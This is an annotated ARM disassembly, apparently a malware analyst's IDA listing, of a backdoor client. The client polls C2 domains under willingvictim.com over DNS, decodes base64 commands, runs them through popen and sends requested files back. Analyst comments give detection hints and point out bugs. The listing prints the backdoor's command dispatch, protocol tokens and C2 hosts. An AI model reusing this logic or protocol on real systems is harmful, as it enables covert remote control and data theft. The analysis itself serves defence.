.text:000118EC                 MOV     R1, #1                  ; size
.text:000118F0                 LDR     R0, =aErrorReadingFi    ; "Error reading file"
.text:000118F4                 BL      fwrite
.text:000118F8                 B       loc_11844               ; still sends START/STOP and the (empty) buffer
.text:000118FC ; ---------------------------------------------------------------------------
.text:000118FC
.text:000118FC loc_118FC                               ; CODE XREF: FILE_command+40j
.text:000118FC                                         ; FILE_command+68j ...
.text:000118FC                 MOV     R0, #0xFFFFFFFF         ; return -1
.text:00011900                 LDMFD   SP!, {R4-R8,PC}
.text:00011900 ; End of function FILE_command
.text:00011900
.text:00011900 ; ---------------------------------------------------------------------------
.text:00011904 ; char *off_11904
.text:00011904 off_11904       DCD aFile               ; DATA XREF: FILE_command+4r
.text:00011904                                         ; FILE_command+10r ...
.text:00011904                                         ; "FILE:"
.text:00011908 ; char *off_11908
.text:00011908 off_11908       DCD aR                  ; DATA XREF: FILE_command+30r
.text:00011908                                         ; "r"
.text:0001190C ; char *off_1190C
.text:0001190C off_1190C       DCD aFileStart_stat     ; DATA XREF: FILE_command+C8r
.text:0001190C                                         ; FILE_command+E0r ...
.text:0001190C                                         ; "FILE:START_STATE,NAME="
.text:00011910 ; char *off_11910
.text:00011910 off_11910       DCD aFileStop_state     ; DATA XREF: FILE_command+124r
.text:00011910                                         ; FILE_command+130r
.text:00011910                                         ; "FILE:STOP_STATE"
.text:00011914 off_11914       DCD __bss_start         ; DATA XREF: FILE_command:loc_118E0r
.text:00011918 ; void *ptr
.text:00011918 ptr             DCD aErrorReadingFi     ; DATA XREF: FILE_command+160r
.text:00011918                                         ; "Error reading file"
.text:0001191C
.text:0001191C ; =============== S U B R O U T I N E =======================================
.text:0001191C
.text:0001191C ; int InterpretAndExecuteCommand(char *answer)   -- analyst reconstruction
.text:0001191C ; One C2 polling round: query "cmd.willingvictim.com", base64-decode the
.text:0001191C ; answer and dispatch on getCommandID: 2 = NONE, 3 = EXEC, 4 = FILE.
.text:0001191C ; In:    R0 = answer buffer (filled by send_packet_to_C_C)
.text:0001191C ; Out:   R0 = -1 if the query or the decode failed or the ID is unknown;
.text:0001191C ;        otherwise 1 -- also when EXEC_command/FILE_command failed, since
.text:0001191C ;        exec_failed only prints and R4 is still 1.
.text:0001191C ; Stack: 8 bytes; var_18 = decoded pointer, var_14 = decoded length
.text:0001191C ; NOTE(review): the decoded buffer at [SP,#var_18] is never freed, and
.text:0001191C ; the 0x800-byte malloc for EXEC is not NULL-checked before use.
.text:0001191C ; Detection: periodic DNS lookups of cmd.willingvictim.com whose answers
.text:0001191C ; decode to NONE/EXEC/FILE commands.
.text:0001191C
.text:0001191C InterpretAndExecuteCommand              ; CODE XREF: mainLoop+54p
.text:0001191C
.text:0001191C var_18          = -0x18                 ; char  *decoded
.text:0001191C var_14          = -0x14                 ; size_t decoded_len
.text:0001191C var_10          = -0x10                 ; (only used to compute &var_14 below)
.text:0001191C
.text:0001191C                 STMFD   SP!, {R4-R6,LR}
.text:00011920                 LDR     R3, =aHello             ; R3 = &aHello, base for the .data pointer table
.text:00011924                 SUB     SP, SP, #8
.text:00011928                 LDR     R1, [R3,#(dword_21ECC - 0x21E54)] ; "cmd.willingvictim.com"
.text:0001192C                 MOV     R5, R0                  ; R5 = answer buffer
.text:00011930                 BL      send_packet_to_C_C      ; poll the C2 for a command
.text:00011934                 CMP     R0, #1
.text:00011938                 BNE     error                   ; query failed -> -1
.text:0001193C                 MOV     R3, #0
.text:00011940                 ADD     R2, SP, #0x18+var_10
.text:00011944                 STR     R3, [R2,#-4]!           ; decoded_len = 0; R2 = &decoded_len
.text:00011948                 MOV     R4, R0                  ; R4 = 1 (provisional return value)
.text:0001194C                 MOV     R1, SP                  ; R1 = &decoded
.text:00011950                 MOV     R0, R5
.text:00011954                 BL      base64_decode           ; aborts via assert on length mismatch
.text:00011958                 LDR     R3, [SP,#0x18+var_14]
.text:0001195C                 CMP     R3, #0
.text:00011960                 BEQ     error                   ; nothing decoded -> -1
.text:00011964                 LDR     R0, [SP,#0x18+var_18]
.text:00011968                 BL      getCommandID
.text:0001196C                 CMP     R0, #2
.text:00011970                 BEQ     NONE_received
.text:00011974                 CMP     R0, #3
.text:00011978                 BEQ     EXEC_received
.text:0001197C                 CMP     R0, #4
.text:00011980                 BEQ     FILE_received
.text:00011984                 MOV     R4, #0xFFFFFFFF         ; unknown ID -> -1
.text:00011988                 LDR     R0, =aControlServerP    ; "\nControl server protocol mistmatch."
.text:0001198C                 BL      printf
.text:00011990                 MOV     R0, R4
.text:00011994                 ADD     SP, SP, #8
.text:00011998                 LDMFD   SP!, {R4-R6,PC}
.text:0001199C ; ---------------------------------------------------------------------------
.text:0001199C
.text:0001199C error                                   ; CODE XREF: InterpretAndExecuteCommand+1Cj
.text:0001199C                                         ; InterpretAndExecuteCommand+44j
.text:0001199C                 MOV     R4, #0xFFFFFFFF
.text:000119A0
.text:000119A0 return                                  ; CODE XREF: InterpretAndExecuteCommand+A4j
.text:000119A0                                         ; InterpretAndExecuteCommand+B0j ...
.text:000119A0                 MOV     R0, R4
.text:000119A4                 ADD     SP, SP, #8              ; decoded is not freed
.text:000119A8                 LDMFD   SP!, {R4-R6,PC}
.text:000119AC ; ---------------------------------------------------------------------------
.text:000119AC
.text:000119AC FILE_received                           ; CODE XREF: InterpretAndExecuteCommand+64j
.text:000119AC                 LDR     R0, =aServerSpecifie    ; "\nServer specified FILE action."
.text:000119B0                 BL      printf
.text:000119B4                 LDR     R0, [SP,#0x18+var_18]   ; decoded command text
.text:000119B8                 BL      FILE_command
.text:000119BC                 CMP     R0, #1
.text:000119C0                 BEQ     return
.text:000119C4
.text:000119C4 exec_failed                             ; CODE XREF: InterpretAndExecuteCommand+F0j
.text:000119C4                 LDR     R0, =aFailedToExecut    ; "\nFailed to execute the command request"...
.text:000119C8                 BL      printf
.text:000119CC                 B       return                  ; R4 is still 1 here: failure is not reported to the caller
.text:000119D0 ; ---------------------------------------------------------------------------
.text:000119D0
.text:000119D0 NONE_received                           ; CODE XREF: InterpretAndExecuteCommand+54j
.text:000119D0                 LDR     R0, =aServerSpecif_0    ; "\nServer specified NONE action."
.text:000119D4                 BL      printf
.text:000119D8                 B       return
.text:000119DC ; ---------------------------------------------------------------------------
.text:000119DC
.text:000119DC EXEC_received                           ; CODE XREF: InterpretAndExecuteCommand+5Cj
.text:000119DC                 LDR     R0, =aServerSpecif_1    ; "\nServer specified EXEC action."
.text:000119E0                 BL      printf
.text:000119E4                 MOV     R0, #0x800              ; size of the output line buffer (EXEC_command reads 0x7FF)
.text:000119E8                 BL      malloc                  ; result not checked
.text:000119EC                 MOV     R1, R0
.text:000119F0                 MOV     R5, R0                  ; R5 = line buffer
.text:000119F4                 LDR     R0, [SP,#0x18+var_18]   ; decoded command text
.text:000119F8                 BL      EXEC_command
.text:000119FC                 MOV     R6, R0                  ; R6 = result (1 or -1)
.text:00011A00                 MOV     R0, R5                  ; ptr
.text:00011A04                 BL      free
.text:00011A08                 CMP     R6, #1
.text:00011A0C                 BNE     exec_failed
.text:00011A10                 B       return
.text:00011A10 ; End of function InterpretAndExecuteCommand
.text:00011A10
.text:00011A10 ; ---------------------------------------------------------------------------
.text:00011A14 off_11A14       DCD aHello              ; DATA XREF: InterpretAndExecuteCommand+4r
.text:00011A14                                         ; "HELLO:"
.text:00011A18 ; char *off_11A18
.text:00011A18 off_11A18       DCD aControlServerP     ; DATA XREF: InterpretAndExecuteCommand+6Cr
.text:00011A18                                         ; "\nControl server protocol mistmatch."
.text:00011A1C ; char *off_11A1C
.text:00011A1C off_11A1C       DCD aServerSpecifie     ; DATA XREF: InterpretAndExecuteCommand:FILE_receivedr
.text:00011A1C                                         ; "\nServer specified FILE action."
.text:00011A20 ; char *off_11A20
.text:00011A20 off_11A20       DCD aFailedToExecut     ; DATA XREF: InterpretAndExecuteCommand:exec_failedr
.text:00011A20                                         ; "\nFailed to execute the command request"...
.text:00011A24 ; char *off_11A24
.text:00011A24 off_11A24       DCD aServerSpecif_0     ; DATA XREF: InterpretAndExecuteCommand:NONE_receivedr
.text:00011A24                                         ; "\nServer specified NONE action."
.text:00011A28 ; char *off_11A28
.text:00011A28 off_11A28       DCD aServerSpecif_1     ; DATA XREF: InterpretAndExecuteCommand:EXEC_receivedr
.text:00011A28                                         ; "\nServer specified EXEC action."
.text:00011A28 ; .text ends
.text:00011A28
.fini:00011A2C ; ===========================================================================
.fini:00011A2C
.fini:00011A2C ; Segment type: Pure code
.fini:00011A2C                 AREA .fini, CODE
.fini:00011A2C ; ORG 0x11A2C
.fini:00011A2C                 CODE32
.fini:00011A2C
.fini:00011A2C ; =============== S U B R O U T I N E =======================================
.fini:00011A2C
.fini:00011A2C ; .term_proc: the linker-generated _fini stub.  The push/pop pair is a
.fini:00011A2C ; no-op here (nothing is linked in between); the TST/MOVEQ/BX sequence
.fini:00011A2C ; is an ARM/Thumb interworking return keyed on bit 0 of LR.
.fini:00011A2C
.fini:00011A2C                 EXPORT .term_proc
.fini:00011A2C .term_proc                              ; DATA XREF: start+10o
.fini:00011A2C                                         ; .text:off_10E44o
.fini:00011A2C                 STMFD   SP!, {R0,LR}            ; _fini
.fini:00011A30                 LDMFD   SP!, {R0,LR}
.fini:00011A34                 TST     LR, #1                  ; Thumb-mode caller ?
.fini:00011A38                 MOVEQ   PC, LR                  ; ARM caller: plain return
.fini:00011A3C                 BX      LR                      ; Thumb caller: interworking return
.fini:00011A3C ; End of function .term_proc
.fini:00011A3C
.fini:00011A3C ; .fini ends
.fini:00011A3C
.rodata:00011A40 ; ===========================================================================
.rodata:00011A40
.rodata:00011A40 ; Segment type: Pure data
.rodata:00011A40                 AREA .rodata, DATA, READONLY
.rodata:00011A40 ; ORG 0x11A40
.rodata:00011A40 ; Read-only strings referenced above.  The libnet error formats belong to
.rodata:00011A40 ; buildAndSendDNSPacket (outside this listing).
.rodata:00011A40 aBase64decode   DCB "Base64Decode",0        ; DATA XREF: base64_decode+80o
.rodata:00011A40                                         ; .text:functiono
.rodata:00011A4D                 ALIGN 0x10
.rodata:00011A50 aLibnet_initS   DCB "libnet_init: %s",0     ; DATA XREF: buildAndSendDNSPacket+228o
.rodata:00011A50                                         ; .text:off_1132Co
.rodata:00011A60 aCSCCCCCCCCCCCC DCB "%c%s%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%s",0
.rodata:00011A60                                         ; DATA XREF: buildAndSendDNSPacket+A4o
.rodata:00011A60                                         ; .text:off_11310o
.rodata:00011A8B                 ALIGN 4
.rodata:00011A8C aCanTBuildDnsPa DCB "Can't build DNS packet: %s",0xA,0
.rodata:00011A8C                                         ; DATA XREF: buildAndSendDNSPacket+1D0o
.rodata:00011A8C                                         ; .text:off_11324o
.rodata:00011AA8 aCanTBuildUdpHe DCB "Can't build UDP header: %s",0xA,0
.rodata:00011AA8                                         ; DATA XREF: buildAndSendDNSPacket+208o
.rodata:00011AA8                                         ; .text:off_11328o
.rodata:00011AC4 aCanTBuildIpHea DCB "Can't build IP header: %s",0xA,0
.rodata:00011AC4                                         ; DATA XREF: buildAndSendDNSPacket+248o
.rodata:00011AC4                                         ; .text:off_11330o
.rodata:00011ADF                 ALIGN 0x10
.rodata:00011AE0 aClient_c DCB "client.c",0 ; DATA XREF: base64_decode+88o .rodata:00011AE0 ; .text:fileo .rodata:00011AE9 ALIGN 4 .rodata:00011AEC aLengthDecodele DCB "*length == decodeLen",0 ; DATA XREF: base64_decode+8Co .rodata:00011AEC ; .text:assertiono .rodata:00011B01 ALIGN 4 .rodata:00011B04 aControlServerP DCB 0xA ; DATA XREF: init_session_with_C2_server:unknown_commando .rodata:00011B04 ; .text:off_11490o ... .rodata:00011B04 DCB "Control server protocol mistmatch.",0 .rodata:00011B28 aR DCB "r",0 ; DATA XREF: EXEC_command+1Co .rodata:00011B28 ; .text:modeso ... .rodata:00011B2A ALIGN 4 .rodata:00011B2C aErrorReadingFi DCB "Error reading file",0 ; DATA XREF: FILE_command+160o .rodata:00011B2C ; .text:ptro .rodata:00011B3F ALIGN 0x10 .rodata:00011B40 aServerSpecif_0 DCB 0xA ; DATA XREF: InterpretAndExecuteCommand:NONE_receivedo .rodata:00011B40 ; .text:off_11A24o .rodata:00011B40 DCB "Server specified NONE action.",0 .rodata:00011B5F ALIGN 0x10 .rodata:00011B60 aServerSpecif_1 DCB 0xA ; DATA XREF: InterpretAndExecuteCommand:EXEC_receivedo .rodata:00011B60 ; .text:off_11A28o .rodata:00011B60 DCB "Server specified EXEC action.",0 .rodata:00011B7F ALIGN 0x10 .rodata:00011B80 aFailedToExecut DCB 0xA ; DATA XREF: InterpretAndExecuteCommand:exec_failedo .rodata:00011B80 ; .text:off_11A20o .rodata:00011B80 DCB "Failed to execute the command requested.",0 .rodata:00011BAA ALIGN 4 .rodata:00011BAC aServerSpecifie DCB 0xA ; DATA XREF: InterpretAndExecuteCommand:FILE_receivedo .rodata:00011BAC ; .text:off_11A1Co .rodata:00011BAC DCB "Server specified FILE action.",0 .rodata:00011BCB ALIGN 4 .rodata:00011BCC aControlServerS DCB 0xA ; DATA XREF: mainLoop:HELLOReceivedo .rodata:00011BCC ; .text:off_10E10o .rodata:00011BCC DCB "Control server says HELLO. Entering command mode.",0 .rodata:00011BFF ALIGN 0x10 .rodata:00011C00 aConnectionCoul DCB 0xA ; DATA XREF: mainLoop+30o .rodata:00011C00 ; .text:formato .rodata:00011C00 DCB "Connection could not be made. 
Sleeping.",0 .rodata:00011C29 ALIGN 4 .rodata:00011C2C aReply_willingv DCB "reply.willingvictim.com",0 .rodata:00011C44 aCmd_willingvic DCB "cmd.willingvictim.com",0 ; DATA XREF: .data:00021ED4o .rodata:00011C5A ALIGN 4 .rodata:00011C5C aCheck_willingv DCB "check.willingvictim.com",0 .rodata:00011C74 a172_16_240_129 DCB "172.16.240.129",0 .rodata:00011C83 ALIGN 4 .rodata:00011C83 ; .rodata ends .rodata:00011C83 .eh_frame:00011C84 ; =========================================================================== .eh_frame:00011C84 .eh_frame:00011C84 ; Segment type: Pure data .eh_frame:00011C84 AREA .eh_frame, DATA, READONLY .eh_frame:00011C84 ; ORG 0x11C84 .eh_frame:00011C84 unk_11C84 DCB 0 ; DATA XREF: sub_10EB8+28o .eh_frame:00011C84 ; .text:off_10EFCo ... .eh_frame:00011C85 DCB 0 .eh_frame:00011C86 DCB 0 .eh_frame:00011C87 DCB 0 .eh_frame:00011C87 ; .eh_frame ends .eh_frame:00011C87 .init_array:00021C88 ; =========================================================================== .init_array:00021C88 .init_array:00021C88 ; Segment type: Pure data .init_array:00021C88 AREA .init_array, DATA .init_array:00021C88 ; ORG 0x21C88 .init_array:00021C88 DCD sub_10F00 .init_array:00021C88 ; .init_array ends .init_array:00021C88 .fini_array:00021C8C ; =========================================================================== .fini_array:00021C8C .fini_array:00021C8C ; Segment type: Pure data .fini_array:00021C8C AREA .fini_array, DATA .fini_array:00021C8C ; ORG 0x21C8C .fini_array:00021C8C DCD sub_10EB8 .fini_array:00021C8C ; .fini_array ends .fini_array:00021C8C .got:00021D78 ; =========================================================================== .got:00021D78 .got:00021D78 ; Segment type: Pure data .got:00021D78 AREA .got, DATA .got:00021D78 ; ORG 0x21D78 .got:00021D78 _GLOBAL_OFFSET_TABLE_ DCD 0x21C90 ; DATA XREF: .plt:00010B34o .got:00021D78 ; .plt:off_10B3Co .got:00021D7C DCD 0 .got:00021D80 DCD 0 .got:00021D84 printf_ptr DCD __imp_printf ; DATA XREF: printf+8r 
.got:00021D88 ; Import profile (defender's view of the capability set, grouped by library):
.got:00021D88 ;   libnet_*                 - hand-built IPv4/UDP/DNS packets written via libnet_write
.got:00021D88 ;   res_*/ns_*/__res_state    - resolver-side DNS lookups and response parsing
.got:00021D88 ;   BIO_*                    - OpenSSL base64 filter over memory BIOs (BIO_f_base64, BIO_s_mem)
.got:00021D88 ;   popen/pclose             - command execution (EXEC action)
.got:00021D88 ;   fopen/fseek/ftell/fread/fwrite/fclose - file I/O (FILE action)
.got:00021D88 ;   sleep                    - retry/beacon delay
.got:00021D88 ; The remaining entries are libc string/memory helpers and CRT support.
.got:00021D88 exit_ptr        DCD __imp_exit           ; DATA XREF: exit+8r
.got:00021D8C ns_initparse_ptr DCD __imp_ns_initparse  ; DATA XREF: ns_initparse+8r
.got:00021D90 strstr_ptr      DCD __imp_strstr         ; DATA XREF: strstr+8r
.got:00021D94 fread_ptr       DCD __imp_fread          ; DATA XREF: fread+8r
.got:00021D98 ns_parserr_ptr  DCD __imp_ns_parserr     ; DATA XREF: ns_parserr+8r
.got:00021D9C fgets_ptr       DCD __imp_fgets          ; DATA XREF: fgets+8r
.got:00021DA0 calloc_ptr      DCD __imp_calloc         ; DATA XREF: calloc+8r
.got:00021DA4 htons_ptr       DCD __imp_htons          ; DATA XREF: htons+8r
.got:00021DA8 __res_state_ptr DCD __imp___res_state    ; DATA XREF: __res_state+8r
.got:00021DAC free_ptr        DCD __imp_free           ; DATA XREF: free+8r
.got:00021DB0 BIO_push_ptr    DCD __imp_BIO_push       ; DATA XREF: BIO_push+8r
.got:00021DB4 BIO_read_ptr    DCD __imp_BIO_read       ; DATA XREF: BIO_read+8r
.got:00021DB8 fprintf_ptr     DCD __imp_fprintf        ; DATA XREF: fprintf+8r
.got:00021DBC BIO_f_base64_ptr DCD __imp_BIO_f_base64  ; DATA XREF: BIO_f_base64+8r
.got:00021DC0 libnet_get_ipaddr4_ptr DCD __imp_libnet_get_ipaddr4
.got:00021DC0                                              ; DATA XREF: libnet_get_ipaddr4+8r
.got:00021DC4 memcpy_ptr      DCD __imp_memcpy         ; DATA XREF: memcpy+8r
.got:00021DC8 libnet_build_ipv4_ptr DCD __imp_libnet_build_ipv4
.got:00021DC8                                              ; DATA XREF: libnet_build_ipv4+8r
.got:00021DCC libnet_destroy_ptr DCD __imp_libnet_destroy ; DATA XREF: libnet_destroy+8r
.got:00021DD0 pclose_ptr      DCD __imp_pclose         ; DATA XREF: pclose+8r
.got:00021DD4 memset_ptr      DCD __imp_memset         ; DATA XREF: memset+8r
.got:00021DD8 res_init_ptr    DCD __imp_res_init       ; DATA XREF: res_init+8r
.got:00021DDC popen_ptr       DCD __imp_popen          ; DATA XREF: popen+8r
.got:00021DE0 BIO_set_flags_ptr DCD __imp_BIO_set_flags ; DATA XREF: BIO_set_flags+8r
.got:00021DE4 BIO_new_mem_buf_ptr DCD __imp_BIO_new_mem_buf ; DATA XREF: BIO_new_mem_buf+8r
.got:00021DE8 res_query_ptr   DCD __imp_res_query      ; DATA XREF: res_query+8r
.got:00021DEC BIO_new_ptr     DCD __imp_BIO_new        ; DATA XREF: BIO_new+8r
.got:00021DF0 BIO_ctrl_ptr    DCD __imp_BIO_ctrl       ; DATA XREF: BIO_ctrl+8r
.got:00021DF4 fwrite_ptr      DCD __imp_fwrite         ; DATA XREF: fwrite+8r
.got:00021DF8 fopen_ptr       DCD __imp_fopen          ; DATA XREF: fopen+8r
.got:00021DFC __deregister_frame_info_ptr DCD __imp___deregister_frame_info
.got:00021DFC                                              ; DATA XREF: __deregister_frame_info+8r
.got:00021E00 snprintf_ptr    DCD __imp_snprintf       ; DATA XREF: snprintf+8r
.got:00021E04 __register_frame_info_ptr DCD __imp___register_frame_info
.got:00021E04                                              ; DATA XREF: __register_frame_info+8r
.got:00021E08 libnet_init_ptr DCD __imp_libnet_init    ; DATA XREF: libnet_init+8r
.got:00021E0C __libc_start_main_ptr DCD __imp___libc_start_main
.got:00021E0C                                              ; DATA XREF: __libc_start_main+8r
.got:00021E10 fseek_ptr       DCD __imp_fseek          ; DATA XREF: fseek+8r
.got:00021E14 fclose_ptr      DCD __imp_fclose         ; DATA XREF: fclose+8r
.got:00021E18 libnet_build_dnsv4_ptr DCD __imp_libnet_build_dnsv4
.got:00021E18                                              ; DATA XREF: libnet_build_dnsv4+8r
.got:00021E1C BIO_free_all_ptr DCD __imp_BIO_free_all  ; DATA XREF: BIO_free_all+8r
.got:00021E20 inet_aton_ptr   DCD __imp_inet_aton      ; DATA XREF: inet_aton+8r
.got:00021E24 libnet_write_ptr DCD __imp_libnet_write  ; DATA XREF: libnet_write+8r
.got:00021E28 libnet_geterror_ptr DCD __imp_libnet_geterror ; DATA XREF: libnet_geterror+8r
.got:00021E2C sleep_ptr       DCD __imp_sleep          ; DATA XREF: sleep+8r
.got:00021E30 strlen_ptr      DCD __imp_strlen         ; DATA XREF: strlen+8r
.got:00021E34 libnet_build_udp_ptr DCD __imp_libnet_build_udp
.got:00021E34                                              ; DATA XREF: libnet_build_udp+8r
.got:00021E38 BIO_write_ptr   DCD __imp_BIO_write      ; DATA XREF: BIO_write+8r
.got:00021E3C libnet_name2addr4_ptr DCD __imp_libnet_name2addr4
.got:00021E3C                                              ; DATA XREF: libnet_name2addr4+8r
.got:00021E40 BIO_s_mem_ptr   DCD __imp_BIO_s_mem      ; DATA XREF: BIO_s_mem+8r
.got:00021E44 __assert_fail_ptr DCD __imp___assert_fail ; DATA XREF: __assert_fail+8r
.got:00021E48 malloc_ptr      DCD __imp_malloc         ; DATA XREF: malloc+8r
.got:00021E4C ftell_ptr       DCD __imp_ftell          ; DATA XREF: ftell+8r
.got:00021E4C ; .got ends
.got:00021E4C
.data:00021E50 ; ===========================================================================
.data:00021E50
.data:00021E50 ; Segment type: Pure data
.data:00021E50                 AREA .data, DATA
.data:00021E50 ; ORG 0x21E50
.data:00021E50 ; Four unnamed zero bytes; IDA shows no xref to them.
.data:00021E50                 DCB 0
.data:00021E51                 DCB 0
.data:00021E52                 DCB 0
.data:00021E53                 DCB 0
.data:00021E54 ; Wire-protocol tokens. They live in writable .data rather than .rodata, which is
.data:00021E54 ; consistent with non-const `char name[] = "..."` definitions in client.c. The four
.data:00021E54 ; message-type prefixes are matched in mainLoop (HELLO:) and getCommandID (the
.data:00021E54 ; Is_it_NONE / Is_it_EXEC labels). Plaintext tokens like these are good detection
.data:00021E54 ; material for DNS-payload inspection.
.data:00021E54 aHello          DCB "HELLO:",0              ; DATA XREF: mainLoop+14o
.data:00021E54                                              ; .text:off_10E08o ...
.data:00021E5B                 ALIGN 4
.data:00021E5C aNone           DCB "NONE:",0               ; DATA XREF: getCommandID:Is_it_NONEo
.data:00021E5C                                              ; .text:off_10FA8o
.data:00021E62                 ALIGN 4
.data:00021E64 aExec           DCB "EXEC:",0               ; DATA XREF: getCommandID:Is_it_EXECo
.data:00021E64                                              ; .text:off_10FACo ...
.data:00021E6A                 ALIGN 4
.data:00021E6C aFile           DCB "FILE:",0               ; DATA XREF: getCommandID+5Co
.data:00021E6C                                              ; .text:off_10FB0o ...
.data:00021E72                 ALIGN 4
.data:00021E74 ; IDA left these as untyped dwords, but each value is a .rodata string address:
.data:00021E74 ;   dword_21E74 = 0x11C74 -> a172_16_240_129   (read by send_packet_to_C_C, sendShortReplyTo_C2_Server)
.data:00021E74 ;   dword_21E78 = 0x11C5C -> aCheck_willingv    (read by init_session_with_C2_server)
.data:00021E74 ;   dword_21E7C = 0x11C2C -> aReply_willingv    (read by sendShortReplyTo_C2_Server, sendLargeReplyTo_C2_server)
.data:00021E74 ;   dword_21ECC = 0x11C44 -> aCmd_willingvic    (read by InterpretAndExecuteCommand)
.data:00021E74 ; Re-typing them as `char *` in IDA will surface the missing string xrefs. Because they
.data:00021E74 ; sit in writable .data, the targets could in principle be swapped at runtime; nothing in
.data:00021E74 ; this listing shows a writer, but check the readers before treating them as constants.
.data:00021E74 dword_21E74     DCD 0x11C74              ; DATA XREF: send_packet_to_C_C+20r
.data:00021E74                                              ; sendShortReplyTo_C2_Server+1Cr ...
.data:00021E78 dword_21E78     DCD 0x11C5C              ; DATA XREF: init_session_with_C2_server+10r
.data:00021E7C dword_21E7C     DCD 0x11C2C              ; DATA XREF: sendShortReplyTo_C2_Server+18r
.data:00021E7C                                              ; sendLargeReplyTo_C2_server+70r
.data:00021E80 ; State-transition markers exchanged by EXEC_command / FILE_command. The FILE start
.data:00021E80 ; marker carries a NAME= field, i.e. the server supplies the file name.
.data:00021E80 aExecStart_stat DCB "EXEC:START_STATE",0    ; DATA XREF: EXEC_command+30o
.data:00021E80                                              ; EXEC_command+3Co ...
.data:00021E91                 ALIGN 4
.data:00021E94 aExecStop_state DCB "EXEC:STOP_STATE",0     ; DATA XREF: EXEC_command+80o
.data:00021E94                                              ; EXEC_command+8Co ...
.data:00021EA4 aFileStart_stat DCB "FILE:START_STATE,NAME=",0 ; DATA XREF: FILE_command+C8o
.data:00021EA4                                              ; FILE_command+E0o ...
.data:00021EBB                 ALIGN 4
.data:00021EBC aFileStop_state DCB "FILE:STOP_STATE",0     ; DATA XREF: FILE_command+124o
.data:00021EBC                                              ; FILE_command+130o ...
.data:00021ECC dword_21ECC     DCD 0x11C44              ; DATA XREF: InterpretAndExecuteCommand+Cr
.data:00021ED0 ; Integer constant read at mainLoop:lookForC2Command; its meaning is not recoverable
.data:00021ED0 ; from the data section - see mainLoop.
.data:00021ED0 dword_21ED0     DCD 2                    ; DATA XREF: mainLoop:lookForC2Commandr
.data:00021ED4 ; Pointer into the middle of aCmd_willingvic, i.e. the bare base domain. No xref is
.data:00021ED4 ; listed for this slot, so whether it is used is unknown from here.
.data:00021ED4                 DCD aCmd_willingvic+4    ; "willingvictim.com"
.data:00021ED4 ; .data ends
.data:00021ED4
.bss:00021ED8 ; ===========================================================================
.bss:00021ED8
.bss:00021ED8 ; Segment type: Uninitialized
.bss:00021ED8                 AREA .bss, DATA
.bss:00021ED8 ; ORG 0x21ED8
.bss:00021ED8 ; __bss_start is also `stderr` here (IDA: "Copy of shared data", i.e. a copy relocation
.bss:00021ED8 ; of libc's object). sub_10E50 references it; with fprintf imported this is presumably
.bss:00021ED8 ; the error-reporting path - confirm.
.bss:00021ED8                 EXPORT __bss_start
.bss:00021ED8 __bss_start     % 4                      ; DATA XREF: sub_10E50o
.bss:00021ED8                                              ; .text:off_10E74o ...
.bss:00021ED8 ; Alternative name is '__bss_start__'
.bss:00021ED8 ; stderr
.bss:00021ED8 ; __bss_start__
.bss:00021ED8 ; _edata
.bss:00021ED8 ; Copy of shared data
.bss:00021EDC ; One-byte flag read by sub_10EB8 (.fini_array entry): matches crtbegin's `completed`
.bss:00021EDC ; guard in __do_global_dtors_aux - likely CRT, confirm.
.bss:00021EDC byte_21EDC      % 1                      ; DATA XREF: sub_10EB8o
.bss:00021EDC                                              ; sub_10EB8+4r ...
.bss:00021EDD                 ALIGN 0x10
.bss:00021EE0 ; 24 zero-initialised bytes referenced only by sub_10F00 (.init_array entry); size and
.bss:00021EE0 ; user match the static `struct object` crtbegin passes to __register_frame_info - confirm.
.bss:00021EE0 unk_21EE0       % 1                      ; DATA XREF: sub_10F00+10o
.bss:00021EE0                                              ; .text:off_10F28o
.bss:00021EE1                 % 1
.bss:00021EE2                 % 1
.bss:00021EE3                 % 1
.bss:00021EE4                 % 1
.bss:00021EE5                 % 1
.bss:00021EE6                 % 1
.bss:00021EE7                 % 1
.bss:00021EE8                 % 1
.bss:00021EE9                 % 1
.bss:00021EEA                 % 1
.bss:00021EEB                 % 1
.bss:00021EEC                 % 1
.bss:00021EED                 % 1
.bss:00021EEE                 % 1
.bss:00021EEF                 % 1
.bss:00021EF0                 % 1
.bss:00021EF1                 % 1
.bss:00021EF2                 % 1
.bss:00021EF3                 % 1
.bss:00021EF4                 % 1
.bss:00021EF5                 % 1
.bss:00021EF6                 % 1
.bss:00021EF7                 % 1
.bss:00021EF8 ; The only .bss slot owned by sample logic (sendLargeBufferTo_C2_server); its contents
.bss:00021EF8 ; are not recoverable from the data section.
.bss:00021EF8 dword_21EF8     % 4                      ; DATA XREF: sendLargeBufferTo_C2_server+44o
.bss:00021EF8                                              ; .text:off_116D4o
.bss:00021EF8 ; .bss ends
.bss:00021EF8
extern:00021EFC ; ===========================================================================
extern:00021EFC
extern:00021EFC ; Segment type: Externs
extern:00021EFC ; int printf(const char *format, ...)
extern:00021EFC ; Import table (one IMPORT per .got slot; each is reached through its PLT stub at
extern:00021EFC ; <name>+8). IDA's C prototypes appear only for libc symbols it recognises; the
extern:00021EFC ; libnet_*, BIO_*, res_*/ns_* entries come from libnet.so.9, libcrypto.so.1.0.0 and
extern:00021EFC ; musl's resolver (see the file header). For triage, the functional groups are:
extern:00021EFC ;   execution  - popen/pclose
extern:00021EFC ;   file I/O   - fopen/fseek/ftell/fread/fwrite/fclose/fgets
extern:00021EFC ;   raw DNS    - libnet_init/libnet_build_dnsv4/libnet_build_udp/libnet_build_ipv4/libnet_write
extern:00021EFC ;   DNS read   - res_init/res_query/__res_state/ns_initparse/ns_parserr
extern:00021EFC ;   encoding   - BIO_f_base64/BIO_s_mem/BIO_new_mem_buf/BIO_push/BIO_read/BIO_write/BIO_ctrl
extern:00021EFC IMPORT __imp_printf                     ; CODE XREF: printf+8j
extern:00021EFC                                         ; DATA XREF: .got:printf_ptro
extern:00021F00 ; void exit(int status)
extern:00021F00 IMPORT __imp_exit                       ; CODE XREF: exit+8j
extern:00021F00                                         ; DATA XREF: .got:exit_ptro
extern:00021F04 IMPORT __imp_ns_initparse               ; CODE XREF: ns_initparse+8j
extern:00021F04                                         ; DATA XREF: .got:ns_initparse_ptro
extern:00021F08 ; char *strstr(const char *haystack, const char *needle)
extern:00021F08 IMPORT __imp_strstr                     ; CODE XREF: strstr+8j
extern:00021F08                                         ; DATA XREF: .got:strstr_ptro
extern:00021F0C ; size_t fread(void *ptr, size_t size, size_t n, FILE *stream)
extern:00021F0C IMPORT __imp_fread                      ; CODE XREF: fread+8j
extern:00021F0C                                         ; DATA XREF: .got:fread_ptro
extern:00021F10 IMPORT __imp_ns_parserr                 ; CODE XREF: ns_parserr+8j
